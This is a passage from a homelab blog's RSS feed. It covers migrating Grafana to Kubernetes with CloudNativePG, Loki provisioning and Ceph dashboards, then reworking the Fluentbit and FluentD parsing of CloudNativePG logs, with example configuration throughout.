CloudNativePG gives the DB type as <code>postgresql</code>, but Grafana expects the name to
be <code>postgres</code>, spitting out the following error message:</p>
<pre tabindex="0"><code>Error: ✗ failed to connect to database: unknown database type: postgresql
</code></pre><p>So I had to switch to providing the individual config options, which also worked
nicely.</p>
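<p>With the individual options, the database part of <code>grafana.ini</code> in the chart values
looks something like the following sketch, assuming the secret is mounted under
<code>/secrets/my-db</code> and leaving the port handling aside:</p>
<pre tabindex="0"><code>grafana.ini:
  database:
    type: postgres
    host: $__file{/secrets/my-db/host}
    name: $__file{/secrets/my-db/dbname}
    user: $__file{/secrets/my-db/user}
    password: $__file{/secrets/my-db/password}
</code></pre>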
<p>The last interesting thing to note about the config is the <code>grafana.ini.auth.generic_oauth.allow_sign_up</code>
option. This needs to be set to <code>true</code> for your first login with your Keycloak
user, so that Grafana can create the user. After that, it can be disabled.</p>
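<p>In the chart values, that boils down to something like this sketch:</p>
<pre tabindex="0"><code>grafana.ini:
  auth.generic_oauth:
    enabled: true
    # needed for the first Keycloak login, can be switched to false afterwards
    allow_sign_up: true
</code></pre>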
<h2 id="grafana-provisioning">Grafana provisioning</h2>
<p>Grafana&rsquo;s provisioning functionality was something I hadn&rsquo;t heard about at all
before this migration. In short, instead of defining data sources and dashboards
manually via the UI, you can provide YAML files in a specific format in a specific
directory or call the Grafana API to create them.</p>
<p>I&rsquo;m currently only making use of this in my own config to add my Loki data source:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">editable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-k8s</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://loki.loki.svc.cluster.local:3100</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>This will add the <code>loki-k8s</code> data source, with the given URL. The <code>access</code> setting
determines how the data is fetched: with <code>proxy</code>, Grafana fetches the data, while
the alternative <code>direct</code> has your browser fetch it.</p>
<p>The same functionality is also used by the <code>kube-prometheus-stack</code> chart to add
the Prometheus instance as a source automatically.</p>
<p>Similarly, dashboards can also be defined in this way. I initially thought that
I would add all my own dashboards this way as well, but then decided against it.
The reason lies in the nature of dashboards, especially when compared to data
sources: I will be changing dashboards relatively often, and might just make
occasional, spur-of-the-moment changes. When a dashboard is supplied
via provisioning, Grafana will always override the version in the database with
the provisioned version. That means whenever I make a change, I would need to
export the dashboard and put it under version control. That seemed like a bit
too much hassle.</p>
<p>The difference compared to data sources is that I will only ever change dashboards
in the UI; editing the JSON version by hand just isn&rsquo;t an option. Data sources,
in contrast, I don&rsquo;t have to look at or extensively test. I define them once, and
then they remain untouched until the next big Homelab migration.
But perhaps Grafana will come up with a good UX to push UI changes back to
provisioned dashboards. I would use it in a heartbeat.</p>
<p>One place where provisioned dashboards are pretty nice is when other Helm charts
bring their own dashboards out of the box, like kube-prometheus-stack does.</p>
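<p>For anyone who does want to provision dashboards via the Grafana chart, it would look
roughly like the following sketch. I did not go this route myself, so the provider name
is a placeholder and the dashboard is just an example pulled from grafana.com by its ID:</p>
<pre tabindex="0"><code>dashboardProviders:
  dashboardproviders.yaml:
    apiVersion: 1
    providers:
      - name: homelab
        folder: Homelab
        type: file
        disableDeletion: false
        options:
          path: /var/lib/grafana/dashboards/homelab
dashboards:
  homelab:
    node-exporter-full:
      gnetId: 1860
      datasource: Prometheus
</code></pre>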
<h2 id="migrating-the-dashboards">Migrating the dashboards</h2>
<p>After the new Grafana instance was finally up and running, I started migrating
over my dashboards. The first one I did was the Ceph dashboard. At the same time,
I enabled metrics gathering for my Rook cluster. Enabling metrics was as simple
as adding the following to the <code>values.yaml</code> file for the Cluster chart (not the
operator chart!):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">monitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>This will enable the required MGR module and set up a Prometheus operator
ServiceMonitor. I initially had problems with actually getting Prometheus to
recognize the new ServiceMonitor, because I had not properly configured the
Namespaces where it looks for them. I fixed this by adding the following option
to the <code>prometheus.prometheusSpec</code> map in the <code>values.yaml</code> file for the
kube-prometheus-stack chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">serviceMonitorSelectorNilUsesHelmValues</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>By default, the chart configures Prometheus to only pick up ServiceMonitors that
carry the chart&rsquo;s own release label. Setting this option to <code>false</code> makes Prometheus
pick up ServiceMonitors from all watched Namespaces regardless of their labels, unless
you have explicitly configured a selector in the chart.</p>
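<p>In context, this sits in the chart values like so:</p>
<pre tabindex="0"><code>prometheus:
  prometheusSpec:
    serviceMonitorSelectorNilUsesHelmValues: false
</code></pre>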
<p>The next issue I observed, still on my old instance, was that the Ceph dashboard
I was using, a fork of <a href="https://grafana.com/grafana/dashboards/2842-ceph-cluster/">this dashboard</a>,
was not handling multiple clusters well. This became an issue because I was now
gathering metrics from both my baremetal and my Rook cluster.</p>
<p>I worked around this by making use of Grafana&rsquo;s <a href="https://grafana.com/docs/grafana/latest/dashboards/variables/">Variables</a>.
I chose the <code>Custom</code> type of variable, and added the following two values:</p>
<pre tabindex="0"><code>job=&#34;ceph-metrics&#34;,job!=&#34;ceph-metrics&#34;
</code></pre><p>My old baremetal cluster&rsquo;s scrape job was called <code>ceph-metrics</code>, and the Ceph
metrics themselves sadly don&rsquo;t come with per-cluster labels.</p>
<p>Let&rsquo;s take a simple Stat panel showing the health of the cluster with this
query:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span> <span style="color:#66d9ef">without</span> <span style="color:#f92672">(</span>instance<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>ceph_health_status{<span style="color:#960050;background-color:#1e0010">${cluster</span>}<span style="color:#960050;background-color:#1e0010">}</span><span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Now with my little workaround, the <code>${cluster}</code> variable will either contain
<code>job=&quot;ceph-metrics&quot;</code> or <code>job!=&quot;ceph-metrics&quot;</code>, cleanly separating the data for
my clusters.</p>
<p>One further change I had to make was to the labels ignored in the aggregation
queries, specifically for the Rook cluster&rsquo;s data: besides
the typical Ceph labels, it also adds the Pod name to some metrics, for example
the <code>ceph_osd_op_r_out_bytes</code> metric. So to get the current read rate for
my OSDs, I now use this query:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span> <span style="color:#66d9ef">without</span> <span style="color:#f92672">(</span>ceph_daemon, instance, pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span><span style="color:#66d9ef">irate</span><span style="color:#f92672">(</span>ceph_osd_op_r_out_bytes{<span style="color:#960050;background-color:#1e0010">${cluster</span>}<span style="color:#960050;background-color:#1e0010">}</span>[<span style="color:#e6db74">5m</span>]<span style="color:#f92672">))</span>
</span></span></code></pre></div><p>The addition here was the <code>pod</code> in the <code>without</code> list.</p>
<p>With that bit of preface out of the way, let&rsquo;s look at the actual dashboard
migration. I opted to go for exporting the dashboard to a local file on my desktop
from the old Grafana and then importing it into the new Grafana.</p>
<p>To export a dashboard, you can use the &ldquo;Share&rdquo; button in the upper right of each
dashboard, next to the &ldquo;Save&rdquo; and &ldquo;Config&rdquo; buttons:</p>
<figure>
    <img loading="lazy" src="export-dashboard.png"
         alt="A screenshot of Grafana&#39;s dashboard export UI. It shows the top part of the dashboard UI in the background, with the button labeled &#39;Share&#39; marked in red. In the foreground is the dashboard share modal, with the &#39;Export&#39; tab selected. On this tab, the &#39;Export for sharing externally&#39; button is checked."/> <figcaption>
            <p>Grafana&rsquo;s dashboard export UI.</p>
        </figcaption>
</figure>

<p>When exporting dashboards for use in another Grafana instance, it is important
to check the &ldquo;Export for sharing externally&rdquo; button. With that, library panels
used in the dashboard are also exported as part of the dashboard.</p>
<p>Once the dashboard is stored in a file, the import is similarly simple. After loading the
previously exported JSON file via Grafana&rsquo;s dashboard import, which is shown as
an option when adding a new dashboard, you are presented with this form:
<figure>
    <img loading="lazy" src="import-dashboard.png"
         alt="A screenshot of Grafana&#39;s dashboard import UI. It contains the name of the dashboard, the unique identifier and dropdowns for choosing the folder to put the imported dashboard and selecting the Prometheus data source which should be used. In the lower part, it shows the heading &#39;Existing library panels&#39;, with two panels named &#39;Ceph Health Status&#39; and &#39;OSDs DOWN&#39;."/> <figcaption>
            <p>Grafana&rsquo;s dashboard import UI.</p>
        </figcaption>
</figure>
</p>
<p>The above import form allows you to set the name, the UID and the folder where
an imported dashboard is placed. Because I chose the &ldquo;Export for sharing externally&rdquo;
option, the import also contains two library panels I have in the dashboard.
Finally, you also get to choose the Prometheus data source to be used, as the
exported dashboard contains placeholders instead of actual IDs for the data
source.</p>
<p>This worked pretty well, including the import of the library panels, but I
still hit an error with exactly those panels. For some reason, the
data source placeholder was not properly replaced during the import, and I got
the following error message on the two library panels:</p>
<figure>
    <img loading="lazy" src="datasource-error.png"
         alt="A screenshot of Grafana&#39;s inspect panel, showing the &#39;Error&#39; tab. The error reads &#39;Datasource ${DS_PROMETHEUS-FOR-LIBRARY-PANEL} was not found.&#39;"/> <figcaption>
            <p>Error on imported library panels.</p>
        </figcaption>
</figure>

<p>I was not able to figure out why I was seeing this error. All of the non-library
panels in this dashboard, as well as all the other dashboards I imported, worked
fine, while all the library panels showed this same error.</p>
<p>I ended up fixing it by going to the &ldquo;JSON&rdquo; tab and manually replacing the
<code>${DS_PROMETHEUS-FOR-LIBRARY-PANEL}</code> placeholder with the name of my Prometheus
data source.</p>
<h2 id="conclusion">Conclusion</h2>
<p>This post finally concludes the migration of my metrics stack over to my Kubernetes
cluster. Besides that, I now also have proper data gathering for the Kubernetes
and Rook clusters. More pretty graphs for me. &#x1f913;</p>
<p>This part of the migration took way longer than previous parts. I hold my return
to gaming, and specifically to Stellaris, partially responsible for
that. &#x1f601;</p>
<p>The next step should hopefully go a bit faster: I will have a look at <a href="https://goharbor.io/">Harbor</a>,
both for my own image storage and as a pull-through cache.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Bite Sized: Some K8s Logging Changes</title>
      <link>https://blog.mei-home.net/posts/some-k8s-logging-changes/</link>
      <pubDate>Thu, 04 Apr 2024 00:17:53 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/some-k8s-logging-changes/</guid>
      <description>Because somehow, logging is complicated?</description>
      <content:encoded><![CDATA[<p>While working on the logging setup for my Grafana, Loki and CloudNativePG
deployments, I found that there were some things I disliked about my original k8s
logging setup, which I described <a href="https://blog.mei-home.net/posts/k8s-migration-6-logging/">here</a>.</p>
<p>This is the start of a new kind of post, where I try to keep the reading time reasonably
short.
Whenever I prefix a post with &ldquo;Bite Sized:&rdquo;, you can expect a short one. I&rsquo;m
trying to wean myself off of the incredibly long, meandering posts I seem to
keep putting out.</p>
<p><em>Hindsight:</em> Well, at least I stayed under 10 minutes.</p>
<h2 id="the-trigger-cloudnativepg-logs">The trigger: CloudNativePG logs</h2>
<p>I&rsquo;m running <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">CloudNativePG</a>
for my database needs in the new k8s cluster. Configuring Grafana for my metrics
stack was the first time I deployed a production database with it. So obviously,
I needed to get the logs properly ingested. To see what we&rsquo;re dealing with,
here are the first couple of log lines from the Postgres Pod in a CloudNativePG
deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29T10:15:37Z&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Starting workers&#34;</span>,<span style="color:#f92672">&#34;controller&#34;</span>:<span style="color:#e6db74">&#34;cluster&#34;</span>,<span style="color:#f92672">&#34;controllerGroup&#34;</span>:<span style="color:#e6db74">&#34;postgresql.cnpg.io&#34;</span>,<span style="color:#f92672">&#34;controllerKind&#34;</span>:<span style="color:#e6db74">&#34;Cluster&#34;</span>,<span style="color:#f92672">&#34;worker count&#34;</span>:<span style="color:#ae81ff">1</span>}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29T10:15:37Z&#34;</span>,<span style="color:#f92672">&#34;logger&#34;</span>:<span style="color:#e6db74">&#34;postgres&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37.836 UTC [23] LOG:  redirecting log output to logging collector process&#34;</span>,<span style="color:#f92672">&#34;pipe&#34;</span>:<span style="color:#e6db74">&#34;stderr&#34;</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;grafana-pg-cluster-1&#34;</span>}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29T10:15:37Z&#34;</span>,<span style="color:#f92672">&#34;logger&#34;</span>:<span style="color:#e6db74">&#34;postgres&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;record&#34;</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;grafana-pg-cluster-1&#34;</span>,<span style="color:#f92672">&#34;record&#34;</span>:{<span style="color:#f92672">&#34;log_time&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37.836 UTC&#34;</span>,<span style="color:#f92672">&#34;process_id&#34;</span>:<span style="color:#e6db74">&#34;23&#34;</span>,<span style="color:#f92672">&#34;session_id&#34;</span>:<span style="color:#e6db74">&#34;660694c9.17&#34;</span>,<span style="color:#f92672">&#34;session_line_num&#34;</span>:<span style="color:#e6db74">&#34;3&#34;</span>,<span style="color:#f92672">&#34;session_start_time&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37 UTC&#34;</span>,<span style="color:#f92672">&#34;transaction_id&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,<span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;LOG&#34;</span>,<span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;00000&#34;</span>,<span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;listening on IPv4 address \&#34;0.0.0.0\&#34;, port 5432&#34;</span>,<span style="color:#f92672">&#34;backend_type&#34;</span>:<span style="color:#e6db74">&#34;postmaster&#34;</span>,<span style="color:#f92672">&#34;query_id&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>}}
</span></span></code></pre></div><p>All three are JSON, which is nice already, meaning I won&rsquo;t need any regexes.</p>
<p>The first line is the easiest to handle; it is produced by the management part of the
CloudNativePG Pod. The second is already a bit more complicated, because it
contains a full Postgres-formatted log message. From that line, I would
at least like to get the log level (<code>LOG</code> in this case) as well as the timestamp.</p>
<p>The third line is then the most complicated, because it contains the Postgres
log in the <code>record</code> key, now in JSON format as well.</p>
<p>But the above is not actually how those logs arrive in my FluentD instance.
First of all, because I use <a href="https://cri-o.io/">cri-o</a>, the first log line
would look like this in the actual log file:</p>
<pre tabindex="0"><code>2024-03-29T11:15:37.627916025+01:00 stderr F {&#34;level&#34;:&#34;info&#34;,&#34;ts&#34;:&#34;2024-03-29T10:15:37Z&#34;,&#34;msg&#34;:&#34;Starting workers&#34;,&#34;controller&#34;:&#34;cluster&#34;,&#34;controllerGroup&#34;:&#34;postgresql.cnpg.io&#34;,&#34;controllerKind&#34;:&#34;Cluster&#34;,&#34;worker count&#34;:1}
</code></pre><p>The prefix <code>&lt;time&gt; &lt;stream&gt; &lt;_p&gt; &lt;log&gt;</code> is added by cri-o to each log
line a container produces, and I think this might be a standardized format
mandated for CRI implementations?
To ingest these logs and send them on to FluentD, I&rsquo;m using Fluentbit, with its
<a href="https://docs.fluentbit.io/manual/pipeline/filters/kubernetes">Kubernetes plugin</a>.
My mistake here was to leave the option <code>Merge_Log</code> enabled. If the content of
<code>&lt;log&gt;</code> is a JSON string, the Kubernetes plugin takes that JSON object and adds
its keys to the record directly. This means that by the time one of the log lines
above arrives at my FluentD instance, it looks like this:</p>
<pre tabindex="0"><code>{[...]
 record=&#34;{\&#34;log_time\&#34;=&gt;\&#34;2024-03-29 22:55:27.814\&#34; [...]
}
</code></pre><p>This is not JSON; instead, it&rsquo;s FluentD&rsquo;s nested-key format. The issue
with this is that FluentD does not seem to have any good tools for working
with an entire subkey. So I can&rsquo;t do anything with the <code>record</code> key as a whole
here - I can only access specific subkeys, e.g. <code>record['record']['log_time']</code>,
at least as long as I don&rsquo;t want to resort to Ruby. And I really, really don&rsquo;t want
to.</p>
<h2 id="time">Time!</h2>
<p>This led me to another issue: while scrolling through some logs in my Grafana
dashboard, I saw that pretty much all of them were prefixed with a <code>time</code> key.
Which looks odd, because <code>time</code> should not appear in a log record&rsquo;s keys.
It turns out that that is the record key into which the CRI parser of Fluentbit
parses the <code>&lt;time&gt;</code> field from the cri-o log line! And because I generally don&rsquo;t
do anything with that key, preferring to use the timestamp from the actual
application log, I just left it in accidentally, polluting the log lines with
unnecessary information.</p>
<p>But, and here comes the real issue: I couldn&rsquo;t just change this behavior. The
cri-o multiline parser is embedded into Fluentbit and not configurable. So
even though Fluentbit generally allows you to configure whether a parser keeps the
time field of the parsed log or not, it did not allow me to do so here.</p>
<p>Next possibility: just drop the <code>time</code> key in Fluentbit, before even sending
the log on to FluentD. But this also wasn&rsquo;t possible, because of the <code>Merge_Log</code>
config of the Fluentbit Kubernetes plugin. Some apps, e.g. Traefik
in my setup, produce JSON log lines with a field called <code>time</code> in those
logs.
Consequently, when a Traefik log line runs through the Kubernetes plugin,
it ends up with its own <code>time</code> field, not the original one from the cri-o parser,
at the top level of the log record. Removing it would mean deleting
Traefik&rsquo;s own timestamp, which I did not want.</p>
<p>Instead of investigating further, I decided to switch <code>Merge_Log</code> off. This way,
Fluentbit never touches the actual log line produced by the app. It only parses
the CRI parts and slaps on some Kubernetes Pod labels, then sends the entire
enchilada on to FluentD for proper massaging.</p>
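<p>For reference, the relevant part of the Fluentbit Kubernetes filter now looks roughly
like this - a sketch, with the match pattern depending on how the tail input tags the
container logs:</p>
<pre tabindex="0"><code>[FILTER]
    Name       kubernetes
    Match      kube.*
    Merge_Log  Off
</code></pre>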
<p>This has the downside that now, I don&rsquo;t get &ldquo;parsed&rdquo; JSON logs for free,
but quite honestly, it isn&rsquo;t that much work to add something like this for the
apps which produce JSON formatted logs:</p>
<pre tabindex="0"><code>&lt;filter services.monitoring.grafana&gt;
    @type parser
    key_name log
    reserve_data true
    remove_key_name_field true
    &lt;parse&gt;
        @type json
        time_key t
        time_type string
        time_format %iso8601
        utc true
    &lt;/parse&gt;
&lt;/filter&gt;
</code></pre><p>This FluentD config only touches the <code>log</code> key of the incoming record: it tries
to parse it as JSON, adds all JSON object keys to the record, and parses
the time from the <code>t</code> key, dropping that key afterwards.</p>
<p>I find this somehow more comforting, because I can be sure that I will always
find the app&rsquo;s original log output in the <code>log</code> key and can then do whatever
parsing I want in FluentD, leaving Fluentbit mostly as a log forwarder/shipper.</p>
<p>I still had to drop the <code>time</code> key from all incoming logs, but now I could be
sure that I was only removing the <code>&lt;time&gt;</code> part from the CRI log file entry,
keeping the actual app log&rsquo;s <code>time</code> key.</p>
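<p>Dropping the key is a one-liner in FluentD, something along these lines:</p>
<pre tabindex="0"><code>&lt;filter **&gt;
    @type record_transformer
    remove_keys time
&lt;/filter&gt;
</code></pre>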
<h2 id="parsing-cloudnativepg-logs">Parsing CloudNativePG logs</h2>
<p>Finally back to the CloudNativePG logs. The first step of the parsing process
is to parse the JSON log from the <code>log</code> key:</p>
<pre tabindex="0"><code>&lt;filter services.*.postgres&gt;
    @type parser
    key_name log
    reserve_data true
    remove_key_name_field true
    &lt;parse&gt;
        @type json
        time_key nil
    &lt;/parse&gt;
&lt;/filter&gt;
</code></pre><p>I&rsquo;m ignoring the time from that log, for now.</p>
<p>Then I have to broadly split the records into two categories: the logs coming
from the cnpg management plane, and the actual Postgres logs. That&rsquo;s done
as follows:</p>
<pre tabindex="0"><code>&lt;match services.*.postgres&gt;
  @type rewrite_tag_filter
  &lt;rule&gt;
    key record
    pattern /^.+$/
    tag pg-record.${tag}
    label @PGRECORD
  &lt;/rule&gt;
  &lt;rule&gt;
    key record
    pattern /^.+$/
    tag pg-no-record.${tag}
    invert true
    label @PGNORECORD
  &lt;/rule&gt;
&lt;/match&gt;
</code></pre><p>This checks whether the record (after parsing of <code>log</code>) has a <code>record</code> key,
and sends the records to different <a href="https://docs.fluentd.org/quickstart/life-of-a-fluentd-event#labels">labels</a>.</p>
<p>First comes the <code>PGRECORD</code> label, which handles log lines which look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29T10:15:37Z&#34;</span>,<span style="color:#f92672">&#34;logger&#34;</span>:<span style="color:#e6db74">&#34;postgres&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;record&#34;</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;grafana-pg-cluster-1&#34;</span>,<span style="color:#f92672">&#34;record&#34;</span>:{<span style="color:#f92672">&#34;log_time&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37.836 UTC&#34;</span>,<span style="color:#f92672">&#34;process_id&#34;</span>:<span style="color:#e6db74">&#34;23&#34;</span>,<span style="color:#f92672">&#34;session_id&#34;</span>:<span style="color:#e6db74">&#34;660694c9.17&#34;</span>,<span style="color:#f92672">&#34;session_line_num&#34;</span>:<span style="color:#e6db74">&#34;3&#34;</span>,<span style="color:#f92672">&#34;session_start_time&#34;</span>:<span style="color:#e6db74">&#34;2024-03-29 10:15:37 UTC&#34;</span>,<span style="color:#f92672">&#34;transaction_id&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,<span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;LOG&#34;</span>,<span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;00000&#34;</span>,<span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;listening on IPv4 address \&#34;0.0.0.0\&#34;, port 5432&#34;</span>,<span style="color:#f92672">&#34;backend_type&#34;</span>:<span style="color:#e6db74">&#34;postmaster&#34;</span>,<span style="color:#f92672">&#34;query_id&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>}}
</span></span></code></pre></div><p>They contain the JSON formatted Postgres log in the <code>record</code> key.</p>
<pre tabindex="0"><code>&lt;label @PGRECORD&gt;
  &lt;filter **&gt;
    @type record_transformer
    remove_keys record
    enable_ruby true
    &lt;record&gt;
      json_record ${record[&#34;record&#34;].to_json}
    &lt;/record&gt;
  &lt;/filter&gt;
  &lt;filter **&gt;
    @type parser
    key_name json_record
    reserve_data true
    remove_key_name_field true
    &lt;parse&gt;
      @type json
      time_key nil
    &lt;/parse&gt;
  &lt;/filter&gt;
  &lt;filter **&gt;
    @type record_transformer
    remove_keys log_time,message,error_severity
    &lt;record&gt;
      ts ${record[&#34;log_time&#34;]}
      level ${record[&#34;error_severity&#34;]}
      msg ${record[&#34;message&#34;]}
    &lt;/record&gt;
  &lt;/filter&gt;
  &lt;match pg-record.**&gt;
    @type relabel
    @label @PGNORECORD
  &lt;/match&gt;
&lt;/label&gt;
</code></pre><p>Okay, so one after the other. First, I need to transform the content of the
<code>record</code> key back into JSON - because in the initial parsing of the <code>log</code> key,
it was transformed into a FluentD nested-key structure. Then I&rsquo;m
parsing that again. The effect of this is that all the
keys from the original <code>record</code> object are now top-level keys of the record itself,
and the <code>record</code> field has been removed.</p>
<p>Then I&rsquo;m rewriting the names of a couple of keys. I do this so they&rsquo;re
similar to the log lines produced by the cnpg management app. After the Postgres
log records pass through this pipeline, all the logs coming from the Postgres
Pod, regardless of whether they come from Postgres itself or the management plane,
look approximately the same.</p>
<p>The unified logs are then further massaged by this pipeline:</p>
<pre tabindex="0"><code>&lt;label @PGNORECORD&gt;
  &lt;filter pg-no-record.**&gt;
    @type parser
    key_name msg
    reserve_data true
    remove_key_name_field false
    &lt;parse&gt;
      @type multi_format
      &lt;pattern&gt;
        format regexp
        expression /^(?&lt;ts&gt;[0-9\-]* [0-9\:\.]* [^\ ]+) [^\ ]* (?&lt;pglvl&gt;[^\ ]*) (?&lt;msg&gt;.*)$/
        time_key nil
      &lt;/pattern&gt;
      &lt;pattern&gt;
        format regexp
        expression /^(?&lt;msg&gt;.*)$/
        time_key nil
      &lt;/pattern&gt;
    &lt;/parse&gt;
  &lt;/filter&gt;
  &lt;filter **&gt;
    @type parser
    key_name ts
    reserve_data true
    remove_key_name_field true
    &lt;parse&gt;
      @type multi_format
      &lt;pattern&gt;
        format regexp
        expression /^(?&lt;logtime&gt;[0-9\-]* [0-9\:\.]* [^\ ]+)$/
        time_key logtime
        time_type string
        time_format %F %T.%N %Z
      &lt;/pattern&gt;
      &lt;pattern&gt;
        format regexp
        expression /^(?&lt;logtime&gt;[0-9]{4}-[01][0-9]-[0-3][0-9]T[0-2][0-9]:[0-6][0-9]:[0-6][0-9].*)$/
        time_key logtime
        time_type string
        time_format %iso8601
        utc true
      &lt;/pattern&gt;
    &lt;/parse&gt;
  &lt;/filter&gt;
  &lt;match **&gt;
    @type rewrite_tag_filter
    remove_tag_regexp /^pg-(no-)?record\./
    &lt;rule&gt;
      key msg
      pattern /^.+$/
      tag parsed.${tag}
      label @K8S
    &lt;/rule&gt;
  &lt;/match&gt;
&lt;/label&gt;
</code></pre><p>Again, going step by step. The first <code>filter</code> config takes the <code>msg</code> key
and parses it, with two potential regex parsers being tried. The first one
recognizes Postgres log lines in string format, like this one:</p>
<pre tabindex="0"><code>2024-03-29 10:15:37.836 UTC [23] LOG:  redirecting log output to logging collector process
</code></pre><p>It properly parses the timestamp and level, which are the two most important
parts for me. All other content of the <code>msg</code> key is left unparsed and is just
written back to the <code>msg</code> key as-is.</p>
<p>Finally, I&rsquo;m parsing the timestamp <code>ts</code>, which looks different now, depending on
whether the log line came from Postgres or from cnpg. For Postgres, the timestamp
looks like this: <code>2024-03-29 10:15:37.836 UTC</code>, while for cnpg it is a properly
formatted <a href="https://en.wikipedia.org/wiki/ISO_8601">ISO8601</a> date/time.</p>
<p>As the last step, I rewrite the tag to start with <code>parsed</code>, which indicates in my
config that the record should skip all the parsing pipelines.</p>
<h2 id="endless-loops---fluentbit-edition">Endless loops - Fluentbit edition</h2>
<p>Before ending for today, one thing needs an honorable mention: I built another
endless loop! &#x1f389;</p>
<p>This time, just by enabling Fluentbit&rsquo;s debug log verbosity. Because then, it
produces a log entry for every message forwarded to FluentD - including its own:</p>
<pre tabindex="0"><code>component=output:forward:forward.0 msg=&#34;send options records=0 chunk=&#39;&#39;
</code></pre><p>The one advantage of having my rack right next to my desk: I heard the fans
crank up their RPMs right away. &#x1f605;</p>
<p>Now you know why I was talking about Eldritch Horrors and the log pipeline being
the most complicated part of my Homelab. I had actually planned to just tidy up the
monitoring stack migration a bit over the long Easter weekend and write the blog
post, so I could get started with the next k8s migration step this
week. Instead, this is what I decided to spend my long weekend on. &#x1f926;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 8a: CloudNativePG Disk Size Problems</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-8a-pg-problems/</link>
      <pubDate>Fri, 29 Mar 2024 16:22:04 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-8a-pg-problems/</guid>
